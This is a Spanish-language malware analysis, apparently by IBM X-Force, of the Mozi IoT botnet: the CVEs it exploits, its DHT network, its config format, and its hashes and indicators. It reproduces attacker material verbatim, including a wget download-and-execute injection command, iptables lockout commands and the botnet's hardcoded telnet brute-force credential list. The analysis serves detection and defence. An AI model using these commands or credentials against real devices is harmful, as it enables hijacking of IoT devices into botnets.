Un jugador relativamente nuevo en el campo de las amenazas, la botnet Mozi, se ha disparado entre los dispositivos de Internet de las cosas (IoT), según ha descubierto IBM® X-Force.
Este malware ha estado activo desde finales de 2019 y tiene una superposición de código con Mirai y sus variantes. Mozi representó casi el 90 % del tráfico de red IoT observado desde octubre de 2019 hasta junio de 2020.
Esta sorprendente adquisición estuvo acompañada de un enorme aumento en la actividad general de las botnets de IoT, lo que sugiere que Mozi no eliminó a los competidores del mercado. Más bien, inundó el mercado, eclipsando la actividad de otras variantes. En general, las instancias combinadas de ataques IoT desde octubre de 2019, cuando los ataques comenzaron a aumentar notablemente, hasta junio de 2020 son un 400 % más altas que las instancias combinadas de ataques IoT de los dos años anteriores.
Este aumento de ataques IoT podría deberse a varias causas, pero en parte puede ser el resultado de un panorama IoT en constante expansión para que los actores de amenazas puedan atacar. Hay alrededor de 31 000 millones de dispositivos IoT implementados en todo el mundo, y la tasa de implementación de IoT es ahora de 127 dispositivos por segundo.
Los atacantes llevan tiempo aprovechando estos dispositivos, sobre todo a través de la botnet Mirai. El equipo de IBM X-Force Incident Response and Intelligence Services (IRIS) lo ha estado siguiendo durante casi cuatro años. Entonces, ¿por qué el salto repentino? La investigación de IBM sugiere que Mozi sigue teniendo éxito en gran medida mediante el uso de ataques de inyección de comandos (CMDi), que a menudo resulta en la configuración incorrecta de los dispositivos IoT. El crecimiento continuo del uso de IoT y los protocolos de configuración deficientes son los posibles culpables de este salto. Este aumento puede haberse visto impulsado aún más por el acceso a redes corporativas de forma remota con mayor frecuencia debido a la COVID-19.
Una botnet de IoT se puede utilizar para realizar ataques DDoS (denegación de servicio distribuido), robar datos y enviar spam. Existen una gran variedad de tipos diferentes de dispositivos IoT para explotar:
Esta gran superficie de ataque deja a las organizaciones vulnerables a botnets de IoT. A eso hay que añadir los agujeros de seguridad que estos dispositivos suelen tener listos para usar y las prácticas de endurecimiento laxas tras la implementación. La vulnerabilidad más notable en el IoT proviene de ataques CMDi.
Casi todos los objetivos de IoT observados por IBM intentaron utilizar ataques CMDi para obtener acceso inicial al dispositivo. Si el endpoint objetivo era un IoT y era susceptible a estos ataques, la carga útil se descargaba y se ejecutaba.
Los ataques CMDi son extremadamente populares contra los dispositivos IoT por varias razones. En primer lugar, los sistemas integrados de IoT suelen contener una interfaz web y una interfaz de depuración sobrantes del desarrollo del firmware que pueden explotarse. En segundo lugar, los módulos PHP incorporados en las interfaces web de IoT pueden explotarse para dar a los actores maliciosos capacidad de ejecución remota. Y en tercer lugar, las interfaces de IoT suelen quedar vulnerables cuando se implementan porque los administradores no las refuerzan al sanitizar la entrada remota esperada. Esto permite a los actores de amenazas realizar entrada de comandos de shell como “wget”.
Nuestro análisis reveló que la botnet Mozi aprovecha CMDi mediante el uso de un comando de shell "wget" y, a continuación, altera los permisos para permitir que el actor de amenazas interactúe con el sistema afectado. Por ejemplo:
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
Si el host fuera vulnerable a CMDi, este comando descargaría y ejecutaría un archivo llamado "mozi.a". Nuestro análisis de esta muestra en particular indica que el archivo se ejecuta en una arquitectura de microprocesador sin bloqueos en las etapas de segmentación (MIPS). Se trata de una extensión que entienden las máquinas que ejecutan una arquitectura de ordenador con conjunto de instrucciones reducido (RISC), que prevalece en muchos dispositivos IoT. Una vez que el atacante obtiene acceso completo al dispositivo a través de la botnet, se puede cambiar el nivel de firmware y se puede plantar malware adicional en el dispositivo.
Aunque este ejemplo cita un vector bien conocido, puede seguir siendo eficaz por dos razones principales. En primer lugar, las nuevas vulnerabilidades permiten la actualización constante de los intentos de explotación a través de CMDi, y se puede explotar la implementación lenta de parches. En segundo lugar, esta actividad se automatiza fácilmente, lo que permite a los actores de amenazas atacar una amplia franja de dispositivos rápidamente a bajo coste.
La infraestructura de la botnet Mozi parece proceder principalmente de China, y representa el 84 % de la infraestructura observada. Este hecho se alinea con otras investigaciones de código abierto sobre la actividad de IoT en 2020.
A continuación se muestra una lista de vulnerabilidades que IBM ha observado que la botnet Mozi intenta explotar:
|Vulnerabilidad
|Dispositivo afectado
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|Enrutadores GPON
|CVE-2014-8361
|Dispositivos que utilizan Realtek SDK
|Router inalámbrico RCI Eir D1000
|Router inalámbrico Eir D1000
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi RCE no autenticado
|Netgear DGN1000
|Ejecución de comandos MVPower DVR
|MVPower DVR TV-7104HE
|CVE-2015-2051
|Dispositivos D-Link
|Ejecución de comandos SOAP UPnP de D-Link
|Dispositivos D-Link
|Proveedores de CCTV-DVR RCE
|Múltiples proveedores de CCTV-DVR
La botnet Mozi es una botnet peer-to-peer (P2P) basada en el protocolo distribuido de tabla hash desordenada (DSHT), que puede propagarse mediante la explotación de dispositivos IoT y contraseñas telnet débiles.
Tras su ejecución, la botnet Mozi intenta enlazar el puerto UDP local 14737. La muestra lee /proc/net/tcp o /proc/net/raw para encontrar y eliminar los procesos que utilizan los puertos 1536 y 5888. El ejemplo comprueba si el archivo /usr/bin/python existe. Si existe, la muestra cambia su nombre de proceso a sshd. De lo contrario, la muestra lo cambia a dropbear.
Se sabe que la botnet Mozi tiene al menos dos características únicas. Utiliza ECDSA384 (algoritmo de firma digital de curva elíptica 384) para verificar su integridad. Además, reutiliza partes del código Gafgyt.
Contiene nodos públicos DHT codificados, que se pueden utilizar para unirse a la red P2P. Estos nodos son:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
La botnet Mozi contiene cuatro capacidades principales. Puede realizar ataques DDoS (HTTP, TCP, UDP); llevar a cabo un ataque de ejecución de comandos; descargar la carga maliciosa de la URL especificada y ejecutarla; y recopilar información sobre bots.
La siguiente tabla contiene detalles de alto nivel sobre los archivos analizados. Los detalles incluyen tanto los archivos presentados como los archivos residuales. (Los archivos residuales son archivos que se extraen de forma estática o dinámica durante el análisis de malware). Los datos incluyen el nombre del archivo, la categoría del archivo determinada por el análisis, el hash del archivo y la filiación del archivo en relación con los demás archivos de la tabla.
|Nombre de archivo
|Categoría de archivo
|Hash de archivo
|Padre
|mozi.m
|Botnet
|4dde761681684d7edad4e5e1ffdb940b
|N/A
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Botnet
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|Botnet
|9a111588a7db15b796421bd13a949cd4
|N/A
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Botnet
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
Tras su ejecución, la muestra intenta enlazar el puerto UDP local 14737. La muestra lee /proc/net/tcp o /proc/net/raw para encontrar y eliminar los procesos que utilizan los puertos 1536 y 5888. El ejemplo comprueba si el archivo /usr/bin/python existe. Si existe, la muestra cambia su nombre de proceso a sshd. De lo contrario, la muestra lo cambia a dropbear:
La muestra también intenta actualizar la lista de control de acceso para bloquear SSH y telnet para evitar que otras botnets los utilicen.
iptables -I INPUT -p tcp –destination-port 22 -j DROP iptables -I INPUT -p tcp –destination-port 23 -j DROP iptables -I INPUT -p tcp –destination-port 2323 -j DROP iptables -I OUTPUT -p tcp –source-port 22 -j DROP iptables -I OUTPUT -p tcp –source-port 23 -j DROP iptables -I OUTPUT -p tcp –source-port 2323 -j DROP
También selecciona aleatoriamente puertos codificados en el iptable:
La botnet Mozi utiliza un protocolo DHT personalizado para desarrollar su red P2P. El proceso de cómo un nuevo nodo Mozi se une a la red DHT es el siguiente:
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
La muestra necesita generar un identificador para el nodo actual. Según un informe de 360 Netlab sobre Mozi, el "ID es de 20 bytes y consiste en el prefijo 888888 incrustado en la muestra o el prefijo especificado por el archivo de configuración [hp], más una cadena generada aleatoriamente". El archivo de configuración se muestra a continuación:.
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Para unirse a la red DHT, la muestra envía una consulta ping a estos nodos públicos DHT codificados. La consulta de ping con ID de nodo se muestra en el tráfico en la siguiente figura de Wireshark
Ambas muestras se empaquetan utilizando un packer UPX personalizado. Borra el valor de p_file_size y p_blocksize a cero en la estructura p_info.
El ejemplo contiene un archivo de configuración codificado que se muestra a continuación:
Contiene cuatro secciones:
Los datos de configuración se codifican mediante una clave XOR codificada, 4E665A8F80C8AC238DAC4706D54F6F7E. Los datos de configuración decodificados se muestran a continuación:
[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]
Los datos de configuración admiten varios comandos etiquetados de la siguiente manera:
|Etiqueta (Comando)
|Descripción
|[ss]
|Rol de bot
|[ssx]
|habilitar/deshabilitar etiqueta [ss]
|[cpu]
|arquitectura de CPU
|[cpux]
|habilitar/deshabilitar etiqueta [cpu]
|[nd]
|nuevo nodo DHT
|[hp]
|Prefijo hash de nodo DHT
|[atk]
|Tipo de ataque DDoS
|[ver]
|Valor en la sección V del protocolo DHT
|[sv]
|Actualizar configuración
|[ud]
|Bot de actualización
|[dr]
|Descargar y ejecutar la carga útil desde la URL especificada
|[rn]
|Ejecutar un comando específico
|[dip]
|ip:port para descargar el bot Mozi
|[idp]
|informar sobre bot
|[count]
|URL que solía informar sobre el bot
La botnet Mozi reutiliza partes del código de Gafgyt en el ataque DDoS (denegación de servicio distribuido). Admite múltiples tipos de ataques DDoS, como HTTP, TCP y UDP.
La firma ECDSA384 1 se utiliza para verificar el valor hash de los datos de configuración. La clave pública codificada que se utiliza para verificar es:
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
Está codificado con la clave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clave pública descodificada es:
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 c6
La versión de configuración determina cuándo actualizar el bot. Actualizará el bot cuando este valor sea mayor que su valor actual. La firma ECDSA384 2 se utiliza para verificar estas tres primeras partes del archivo de configuración. La clave pública codificada que se utiliza para verificar es:
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 A1
Está codificado con la clave XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clave pública descodificada es:
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea ef
Además de las vulnerabilidades que explota la botnet Mozi para obtener acceso al dispositivo víctima, la botnet Mozi también puede forzar credenciales de telnet por fuerza bruta utilizando una lista codificada de credenciales:
root admin CUAdmin default rapport super telnetadmin !!Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xJ4pCYeW v2mprt PhrQjGzk h@32LuyD gw1admin adminpass xmhdipc juantech @HuaweiHgw adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 1111 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 meinsm
A continuación se muestra una fuerza bruta de inicio de sesión de telnet utilizada por la muestra:
Mozi.m y Mozi.a
Red
dht[.]transmissionbt[.]com:6881 router[.]bittorrent[.]com:6881 router[.]utorrent[.]com:6881 bttracker[.]debian[.]org:6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Cadenas notables (unpacked)
8.8.8.8 /proc/net/route Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0) Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 como Mac OS X) AppleWebKit/600.1.4 (KHTML, como Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, como Gecko) Version/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, como Gecko) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) como Gecko Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, como Gecko) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, como Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US) Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0 GET HEAD POST ./config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I INPUT -p tcp –destination-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 50023 -j DROP iptables -I OUTPUT -p tcp –source-port 35000 -j DROP iptables -I INPUT -p tcp –destination-port 7547 -j DROP iptables -I OUTPUT -p tcp –source-port 7547 -j DROP [cpux] [/cpux] [cpu] [/cpu] [ssx] [/ssx] [ss] [/ss] none [sv] [/sv] [rn] [/rn] run: [nd] [/nd] /tmp /var /temp iptables -I INPUT -p udp –destination-port %d -j ACCEPT iptables -I OUTPUT -p udp –source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp –destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT 0.0.0.0 [idp] This node doesn’t accept announces dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
El panorama de las botnets de IoT continúa cambiando y los datos de IBM Security sugieren que los actores de amenazas continúan activos en este espacio. A medida que los grupos de botnets más nuevos, como Mozi, aumentan las operaciones y la actividad general de IoT, las organizaciones que utilizan dispositivos IoT deben ser conscientes de la evolución de la amenaza. IBM ve cada vez más dispositivos IoT empresariales bajo el fuego de los atacantes. La inyección de comandos sigue siendo el vector de infección principal preferido por los actores de amenazas, reiterando la importancia de cambiar la configuración predeterminada del dispositivo y usar pruebas de penetración efectivas para encontrar y corregir las brechas en el blindaje.
Metadatos de Mozi.m
|Nombre de archivo:
|Mozi.m
|Tamaño del archivo:
|108 808
|MD5:
|4dde761681684d7edad4e5e1ffdb940b
|SHA1:
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256:
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|Tipo de archivo:
|Ejecutable ELF MSB de 32 bits, MIPS, MIPS-I versión 1 (SYSV), vinculado estáticamente, eliminado
|Categoría:
|Botnet
|Nombre de IRIS:
|Mozi
|Otros nombres:
Mozi.a Metadata
|Nombre de archivo:
|Mozi.a
|Tamaño del archivo:
|95 268
|MD5:
|9a111588a7db15b796421bd13a949cd4
|SHA1:
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256:
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|Tipo de archivo:
|Ejecutable LSB ELF de 32 bits, ARM, versión 1, enlazado estáticamente, eliminado
|Categoría:
|Botnet
|Nombre de IRIS:
|Mozi
|Otros nombres:
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata
|Nombre de archivo:
|d546_unpacked
|Tamaño del archivo:
|266 108
|MD5:
|86d42d968d3d12c36722e16c78e49ffb
|SHA1:
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256:
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Tipo de archivo:
|Ejecutable ELF MSB de 32 bits, MIPS, MIPS-I versión 1 (SYSV), vinculado estáticamente, eliminado
|Categoría:
|Botnet
|Nombre de IRIS:
|Mozi
|Otros nombres:
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata
|Nombre de archivo:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Tamaño del archivo:
|212 464
|MD5:
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1:
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256:
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Tipo de archivo:
|b'ELF de 32 bits LSB ejecutable, ARM, versión 1, estáticamente vinculado, eliminado'
|Categoría:
|Botnet
|Nombre de IRIS:
|Mozi
|Otros nombres: